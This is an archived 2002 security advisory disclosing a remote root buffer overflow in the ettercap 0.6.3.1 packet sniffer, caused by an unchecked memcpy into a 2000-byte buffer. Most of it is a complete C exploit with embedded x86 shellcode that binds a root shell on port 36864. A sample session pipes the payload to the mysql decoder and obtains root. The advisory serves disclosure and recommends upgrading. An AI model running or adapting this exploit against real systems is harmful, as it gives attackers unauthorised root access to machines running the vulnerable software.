18th Feb 2002 [SBWID-5106]
COMMAND
ettercap remote root vulnerability
SYSTEMS AFFECTED
linux version 0.6.3.1, maybe prior.
PROBLEM
Fermín J. Serna found following, in Next Generation Security
Technologies advisory NGSEC-2002-1 [http://www.ngsec.com] :
As it is said in ettercap\'s home page \"Ettercap is a multipurpose
sniffer/interceptor/logger for switched LAN\". Due to improper use of
the memcpy() function, anyone can crash ettercap and execute code as
root user.
This vulnerability only exists on Linux version because on *BSD and
MacOSX ettercap only works on ethernets devices.
Technical description:
-----------------------
Ettercap is composed of decoders which looks for user, passwords,
communities and stuff alike.
Several decoders (mysql, irc, ...) suffer the following problem:
memcpy(collector, payload, data_to_ettercap->datalen);
Collector is declared as:
u_char collector[MAX_DATA];
Where MAX_DATA is:
#define MAX_DATA 2000
Datalen is the data (after TCP/UDP header) length read from the
interface. So on interfaces where MTU is higher than 2000 you can
exploit ettercap. Since normal ethernets have MTU:1500 this bug can not
be exploited due to unsupported defragmentation in ettercap, but may be
crashed with a forged packet (ip->tot_len > MAX_DATA).
Here are common MTU and interface types:
65535 Hyperchannel
17914 16 Mbit/sec token ring
8166 Token Bus (IEEE 802.4)
4464 4 Mbit/sec token ring (IEEE 802.5)
1500 Ethernet
1500 PPP (typical; can vary widely)
Exploit for this vulnerability
******************************
/*
* ettercap-0.6.3.1 remote root xploit
*
* By: Fermín J. Serna <fjserna@ngsec.com>
* Next Generation Security Technologies
* http://www.ngsec.com
*
* DESCRIPTION:
* ============
*
* Several decoders (mysql, irc, ...) suffer the following problem:
*
* memcpy(collector, payload, data_to_ettercap->datalen);
*
* collector is declared as:
*
* u_char collector[MAX_DATA];
*
* where MAX_DATA is:
*
* #define MAX_DATA 2000
*
* So on interfaces where MTU is higher than 2000 you can exploit
* ettercap. Nop, normal ethernets have MTU:1500 ;P
*
* Here are common MTU and interface types:
*
* 65535 Hyperchannel
* 17914 16 Mbit/sec token ring
* 8166 Token Bus (IEEE 802.4)
* 4464 4 Mbit/sec token ring (IEEE 802.5)
* 1500 Ethernet
* 1500 PPP (typical; can vary widely)
*
* Sample explotation could be also in loopback interfaces: MTU:16436
*
* piscis:~# ettercap -NszC -i lo &
* [1] 21887
* piscis:~# ./ettercap-x 0 | nc localhost mysql
* ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>
* Next Generation Security Technologies
* http://www.ngsec.com
*
* punt!
* piscis:~# telnet localhost 36864
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is \'^]\'.
* id;
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
*
* Madrid, 5/02/2002
*
*/
#include <stdio.h>
#include <string.h>
#define NUM_ADDR 100
#define NOP 0x41
#define BUFF_SIZE 2200
#define RET_ADDR 0xbfffea58
#define OFFSET 0
char shellcode[]=
\"\\x1b\\xeb\\x78\\x5e\\x29\\xc0\\x89\\x46\\x10\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\"
\"\\x89\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\\x80\\xeb\\x01\\x3C\\x43\\xc6\\x46\"
\"\\x10\\x10\\x66\\x89\\x5e\\x14\\x88\\x46\\x08\\x29\\xc0\\x89\\xc2\\x89\\x46\\x18\"
\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\"
\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\"
\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\xeb\\x01\\x2D\\x86\\xc3\\xb0\\x3f\\x29\\xc9\"
\"\\xcd\\x80\\xb0\\x3f\\x41\\xcd\\x80\\xb0\\x3f\\x41\\xcd\\x80\\x88\\x56\\x07\\x89\"
\"\\x76\\x0c\\x87\\xf3\\x8d\\x4b\\x0c\\xb0\\x0b\\xcd\\x80\\xe8\\x83\\xff\\xff\\xff\"
\"/bin/sh\";
int main(int argc, char **argv) {
char buffer[BUFF_SIZE];
char *ch_ptr;
unsigned long *lg_ptr;
int aux;
int offset=OFFSET;
fprintf(stderr,\"ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>\\n\");
fprintf(stderr,\"Next Generation Security Technologies\\n\");
fprintf(stderr,\"http://www.ngsec.com\\n\\n\");
if (argc==2) offset=atoi(argv[1]);
memset(buffer,0,sizeof(buffer));
ch_ptr=buffer;
memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);
ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;
memcpy(ch_ptr,shellcode,strlen(shellcode));
ch_ptr+=strlen(shellcode);
lg_ptr=(unsigned long *)ch_ptr;
for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;
ch_ptr=(char *)lg_ptr;
*ch_ptr=\'\\0\';
printf(\"%s\",buffer);
return(0);
}
Sample exploitation could be also in loopback interfaces: MTU:16436
piscis:~# ettercap -NszC -i lo &
[1] 21887
piscis:~# ./ettercap-x 0 | nc localhost 3306
ettercap-0.6.3.1 xploit by Fermín J. Serna <fjserna@ngsec.com>
Next Generation Security Technologies
http://www.ngsec.com
punt!
piscis:~# telnet localhost 36864
Trying 127.0.0.1...
Connected to localhost.
Escape character is \'^]\'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),10(wheel)
SOLUTION
Upgrate to a newer ettercap version. Run ettercap on a secure
environment.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
